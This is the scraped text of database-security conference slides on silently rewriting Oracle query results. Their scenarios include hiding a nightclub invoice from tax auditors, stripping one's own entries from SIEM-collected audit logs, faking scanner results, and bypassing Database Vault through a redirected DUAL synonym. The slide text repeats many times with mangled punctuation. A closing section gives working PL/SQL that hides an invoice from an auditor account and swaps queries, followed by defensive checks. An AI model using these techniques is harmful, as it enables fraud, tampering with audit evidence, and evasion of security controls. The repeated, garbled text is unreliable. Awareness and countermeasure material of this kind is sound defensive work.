required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
dbms_macadm (Database Vault rule function as shown on the slide):

FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;

The rule function reads the statement text FROM DUAL without an owner prefix, so SYS can redirect that lookup by pointing the public synonym DUAL at a view of his own:

SQL> create or replace view mydual as select 'X' as dummy from dual where user = 'DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;

SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank ("the catastrophe in the database", Gunther Pipperr)
... where x=y
WHERE conditions can be changed using VPD (Virtual Private Database): a policy function appends its own predicate to every statement against the protected object, and the application's query text never changes.
VPD adds a WHERE clause, e.g. on invoice_name = 'SAUNA_CLUB CHANTAL'
Effect: hide "certain" invoices from the audit department without touching the auditor's query
select value from table/view where x=y
The SQL Translation Framework (12c only) can replace an entire query: the user submits query A and the framework silently substitutes query B before execution, so the client receives the result of query B under the name of query A.
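The two rewrites described on the VPD slide and the SQL Translation Framework slide above, as an added Oracle SQL/PL-SQL example that is not part of the original slides. The schema APP, the table APP.INVOICES with the columns INVOICE_NAME, AMOUNT and YEAR, the user AUDITOR and the profile name APP_PROFILE are assumptions for illustration; the VPD predicate is written as an exclusion (<>) because the slide's goal is to hide the invoice. The block needs EXECUTE on DBMS_RLS and the CREATE SQL TRANSLATION PROFILE privilege and runs against a 12c database.

```sql
-- Added example (not from the slides). APP, APP.INVOICES, AUDITOR and
-- APP_PROFILE are assumed names.

-- 1. VPD: the policy function appends a predicate to every SELECT on
--    APP.INVOICES. The auditor still types
--    "select * from app.invoices where year = 2016", but one row is gone.
CREATE OR REPLACE FUNCTION app.hide_invoice (p_schema IN VARCHAR2,
                                             p_object IN VARCHAR2)
  RETURN VARCHAR2
AS
BEGIN
  -- Only the auditor gets the predicate; every other session sees all rows,
  -- so the manipulation is invisible in normal application use.
  IF SYS_CONTEXT('USERENV', 'SESSION_USER') = 'AUDITOR' THEN
    RETURN q'[invoice_name <> 'SAUNA_CLUB CHANTAL']';
  END IF;
  RETURN NULL;   -- NULL predicate = no filtering
END;
/

BEGIN
  DBMS_RLS.ADD_POLICY(
    object_schema   => 'APP',
    object_name     => 'INVOICES',
    policy_name     => 'INVOICE_FILTER',
    function_schema => 'APP',
    policy_function => 'HIDE_INVOICE',
    statement_types => 'SELECT');
END;
/

-- 2. SQL Translation Framework (12c): a static translation that replaces
--    query A with query B for every session that uses the profile. The match
--    is on the exact text (its SQL_ID), which is why the slide's "random
--    string" countermeasure defeats it.
BEGIN
  DBMS_SQL_TRANSLATOR.CREATE_PROFILE('APP_PROFILE');
  DBMS_SQL_TRANSLATOR.REGISTER_SQL_TRANSLATION(
    profile_name    => 'APP_PROFILE',
    sql_text        => q'[select sum(amount) from app.invoices where year = 2016]',
    translated_text => q'[select sum(amount) from app.invoices
                          where year = 2016
                            and invoice_name <> 'SAUNA_CLUB CHANTAL']');
END;
/

-- The victim session must use the profile; the profile owner grants it and
-- the session (or a logon trigger acting on its behalf) activates it.
GRANT ALL ON SQL TRANSLATION PROFILE app_profile TO auditor;
ALTER SESSION SET SQL_TRANSLATION_PROFILE = app_profile;

-- SQL*Plus only applies translations when this event is set; OCI and JDBC
-- clients translate as soon as the profile is active.
ALTER SESSION SET EVENTS = '10601 trace name context forever, level 32';
```

Both mechanisms leave the submitted statement untouched, which is the point of the slide: nothing in the auditor's own SQL reveals that the result has been filtered or that a different statement ran.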
Possible countermeasures for paranoid auditors
Add a comment containing a random string (e.g. aksdjhiuz) to every query: the SQL Translation Framework matches registered translations on the exact statement text, so the changed text gets a new SQL_ID and is not translated
Try to get the EXEMPT ACCESS POLICY privilege, which makes the session bypass all VPD policies (even if the application does not use VPD)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views) and compare them between audits
Check the current schema to detect attacks via ALTER SESSION SET CURRENT_SCHEMA = otheruser, which silently resolves unqualified names in another schema
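The checks listed above, plus the DUAL-synonym check for the Database Vault trick shown earlier, as an added SQL example that is not part of the original slides. It runs against the data dictionary of a 12c database (DBA_VIEWS.TEXT_VC, STANDARD_HASH and the SQL translation views are 12c features), needs SELECT on the DBA_* views, and the schema APP and the table name INVOICES are assumptions.

```sql
-- Added example (not from the slides): checks an auditor runs at the start of
-- a session. APP and INVOICES are assumed names; every query addresses
-- SYS.DUAL by its fully qualified name instead of the public synonym.

-- 1. Session user vs. current schema. If they differ, unqualified names such
--    as INVOICES resolve in the other schema.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;

-- 2. Does the public synonym DUAL still point at SYS.DUAL, and is that a
--    table? The Database Vault slide redirected this synonym to a view.
SELECT s.table_owner, s.table_name, o.object_type
  FROM dba_synonyms s
  LEFT JOIN dba_objects o
         ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.owner = 'PUBLIC' AND s.synonym_name = 'DUAL';
-- expected: exactly one row, SYS  DUAL  TABLE

-- 3. Is the object the application addresses really a table, and does a
--    second object of that name (synonym, view in another schema) exist?
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name = 'INVOICES'
 ORDER BY owner, object_type;

-- 4. VPD: policies in force, and who holds EXEMPT ACCESS POLICY. That
--    privilege bypasses every VPD policy; the auditor wants it, and nobody
--    else should have it unnoticed.
SELECT object_owner, object_name, policy_name, pf_owner, function, enable
  FROM dba_policies
 WHERE object_owner NOT IN ('SYS', 'SYSTEM');

SELECT grantee, admin_option
  FROM dba_sys_privs
 WHERE privilege = 'EXEMPT ACCESS POLICY';

-- 5. SQL Translation Framework: any profile or registered translation is
--    suspicious unless the application is a migrated non-Oracle application.
SELECT owner, profile_name, translator
  FROM dba_sql_translation_profiles;

SELECT owner, profile_name, sql_text, translated_text
  FROM dba_sql_translations;

-- 6. Checksums of view definitions. Save this result set after the first run
--    and compare on every later run; a changed hash means the view was
--    redefined. TEXT_VC is truncated at 4000 characters, so hash
--    DBMS_METADATA.GET_DDL('VIEW', view_name, owner) for longer views.
SELECT owner, view_name,
       STANDARD_HASH(text_vc, 'SHA256') AS view_sha256
  FROM dba_views
 WHERE owner = 'APP'
 ORDER BY view_name;
```

Check 5 only catches static translations registered with DBMS_SQL_TRANSLATOR; a profile with a TRANSLATOR package can rewrite statements it has never seen before, so a non-empty TRANSLATOR column deserves the same attention as a registered translation.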
Modifying queries on the fly
These are powerful features for applications
On critical systems they carry (huge) potential to modify application logic (e.g. the Database Vault rule shown above)
DBAs, auditors and the security department should be aware of the Oracle features that can be used to modify application logic
Audit these features even if they are not in use
Trends 2017
New hardening documents for Oracle 12.2 are required (new features, new packages, ...)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q & A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany